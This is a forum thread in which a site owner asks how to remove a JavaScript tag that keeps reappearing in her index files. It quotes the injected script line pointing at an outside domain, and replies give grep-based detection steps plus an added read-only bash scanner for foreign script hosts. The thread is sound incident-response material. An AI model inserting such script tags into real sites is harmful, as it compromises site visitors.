Anybody know anything about JavaScript Code Insertion into Files?

Discussion in 'Black Hat SEO Tools' started by MissLinda, May 11, 2011.

  1. MissLinda

    MissLinda Newbie

    Hi Guys,

    About 10 websites on my server have been infected.
    All of my index.php, index.htm and index.html files have the same problem with different codes:

    this is an example

    <script type=" text/javascript" src=" http://teepak4you.com/counter.js"></script>

    There are hundreds and hundreds of them

    After I clean them... they appear again... a few days later

    I switched servers...uploaded all clean/new files...and a week later same thing

    Anybody know how to fix?
     
  2. Drink More Tea

    Drink More Tea Regular Member

    Can I ask what sort of hosting your sites are on? i.e. shared/dedicated?

    It may well be that you are on a server with other sites which are poorly configured or not updated to the latest version of whatever software they use.

    The other thing I can think of is that it might be an sql injection into some insecure part of your site, or it may well be that you are using an exploitable version of some software on your server, which could only be resolved by upgrading to the latest version.

    It might also be a previously unknown 0day exploit, in which case there is next to nothing you could do.
     
  3. futurestic06

    futurestic06 Supreme Member

    I think you are using a shared server, and yes, if the software is not updated regularly then it is possible for this type of problem to appear.
     
  4. JenniferMartin

    JenniferMartin Regular Member

    Hey Linda, you are using some nulled and infected script on your websites and that script is causing the issues.
     
  5. MissLinda

    MissLinda Newbie

    Hi guys,

    Thanks for the replies

    All my stuff is up to date. I use WordPress with a phpBB forum

    All up to date

    Moved servers, have firewalls, checked SQL and FTP and all

    Found this file though... js.php that has a code that is an IP address which leads to Latvia... should I remove that file?

    Does it do anything?

    A security website wants to charge me $2500 to update my website security and clean it all out
     
  6. roamer

    roamer Power Member

    If you have changed all variables every time BUT the files, then there must be something in there. That file is probably the culprit. Paste the code using code tags, at least the relevant section of it.
     
  7. Drink More Tea

    Drink More Tea Regular Member

    There is a project of that name which is listed here : hxxp://phpjs.org/pages/home

    The source code of it is available, so you could probably use diff and grep to see if they match or not.
     
  8. TogaPartee

    TogaPartee Newbie

    - in your control panel, do you have option to archive logs? usually server logs get deleted every day but if your host has cpanel then there is option to archive - e.g. retain all the logs : having raw logs gives you the ability to see what the hacker did
    - what is the date of the javascript file? there is a good chance your hacker was active on the same date and logs from that date would be a good clue
    - double check those mysql databases for extra users with ADMIN rights
    - if you have ssh access - you may need to request one from your host, then you can run some very useful commands, for example searching all files in your website directory that contain certain footprints of hacking

    one ssh command would be
    Code:
    grep -r "base64_decode(" substitute_with_your_directory >base65_decode.txt
    or

    Code:
    grep -r "IP_address_of_the_Latvia_server" substitute_with_your_directory >badboyip.txt
    make sure to change substitute_with_your_directory to a directory name on your server (for example on cpanel servers it would be public_html )

    these ssh commands search all files in the given directory for a string, in the first case it's a string
    base64_decode(
    in the second case you would substitute IP_address_of_the_Latvia_server with the actual IP address from Latvia

    then you would end up with two files named
    base65_decode.txt
    and that file would give you a list of all files on your server that contain the text string
    The file named badboyip.txt would contain all files on your server that have that IP address in them
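
The search steps in the post above (grep the web root for a footprint, note the file dates for the log review), applied to the injected `<script>` tag from the first post. This is an added example, not part of the thread; the function names and the `cdn.example` / `bad.example` hosts are constructed for illustration, and it assumes GNU grep and GNU date.

```shell
#!/usr/bin/env bash
# Added example, not from the thread. Read-only triage: lists findings, changes nothing.
# Assumes GNU grep and GNU date (typical Linux hosting with SSH access).

# scan_injected_scripts DIR [ALLOWED_HOST...]
# One line per external <script src=...> host that is not on the allowlist:
#   file mtime <TAB> host <TAB> file
scan_injected_scripts() {
    local root=$1; shift
    local allowed=" $* " file host mtime
    # Tolerates the stray space after the opening quote seen in the sample tag.
    local tag='<script[^>]*src=["'\'']?[[:space:]]*https?://[^/"'\''[:space:]>]+'
    grep -rIlEi --include='*.php' --include='*.htm' --include='*.html' \
        -e "$tag" "$root" 2>/dev/null | sort |
    while IFS= read -r file; do
        mtime=$(date -r "$file" '+%Y-%m-%d %H:%M')   # date to look up in the raw logs
        grep -oEi -e "$tag" "$file" | sed -E 's#^.*://##' |
            tr '[:upper:]' '[:lower:]' | sort -u |
        while IFS= read -r host; do
            case "$allowed" in
                *" $host "*) ;;   # host you loaded on purpose, skip
                *) printf '%s\t%s\t%s\n' "$mtime" "$host" "$file" ;;
            esac
        done
    done
}

# hosts_by_count DIR [ALLOWED_HOST...]: "count host", most widespread first.
hosts_by_count() {
    scan_injected_scripts "$@" | cut -f2 | sort | uniq -c | sort -rn |
        awk '{print $1, $2}'
}

# Constructed sample web root (not real data): one clean page, two infected.
make_sample_root() {
    local d; d=$(mktemp -d)
    mkdir -p "$d/blog"
    printf '%s\n' '<script src="https://cdn.example/lib.js"></script>' > "$d/about.html"
    printf '%s\n' '<script type=" text/javascript" src=" http://bad.example/c.js"></script>' \
        '<script src="https://cdn.example/lib.js"></script>' > "$d/index.php"
    printf '%s\n' '<SCRIPT SRC="http://Bad.Example/c.js"></SCRIPT>' > "$d/blog/index.html"
    touch -t 201105090300 "$d/index.php"
    printf '%s\n' "$d"
}

if [ "$#" -gt 0 ]; then scan_injected_scripts "$@"; fi
```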
     
  9. beakon

    beakon Regular Member

    I had this happen to a lot of my sites on shared hosting on godaddy about a year ago. What a pain in the ass this was. I basically just downloaded my entire server's content, and did mass file search and replaces for all the infected code. Then re-uploaded it all again.